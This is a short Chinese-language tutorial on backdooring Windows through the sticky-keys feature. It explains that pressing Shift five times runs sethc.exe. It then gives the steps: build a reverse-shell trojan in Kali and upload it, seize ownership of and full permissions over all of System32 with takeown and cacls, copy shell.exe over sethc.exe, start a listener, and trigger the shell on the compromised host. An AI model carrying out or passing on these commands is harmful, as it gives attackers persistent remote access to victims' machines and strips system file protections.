原理：沾滞键的目的是为了帮助那些按键有困难的人设计的，在Windows系统下连续按5次shift键后，系统就会执行C:\Windows\System32下的sethc.exe，也就是启用了沾滞键，但是当我们将shell.exe文件把sethc.exe文件通过更改名称给覆盖掉，当我们连续按下5次shift后执行的就是“shell.exe”文件了。

1、kali制作反弹木马,上传木马至受害机

2、shell.exe覆盖sethc.exe

copy C:\WINDOWS\system32\shell.exe​ C:\windows\system32\sethc.exe

//如果没指定生成的文件，会直接覆盖copy的第二个参数，相当于将第二个参数换成了第一个参数，但是文件外部名称没变

出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员，命令如下

takeown  /f  c:\windows\system32\*.*  /a  /r  /d  y  # 获取整个文件夹及其下面子目录文件的所属权

cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows\system32\目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)
 

 成功覆盖

 3、kali开启监听

 4、失陷主机按下5次shift键，成功反弹shell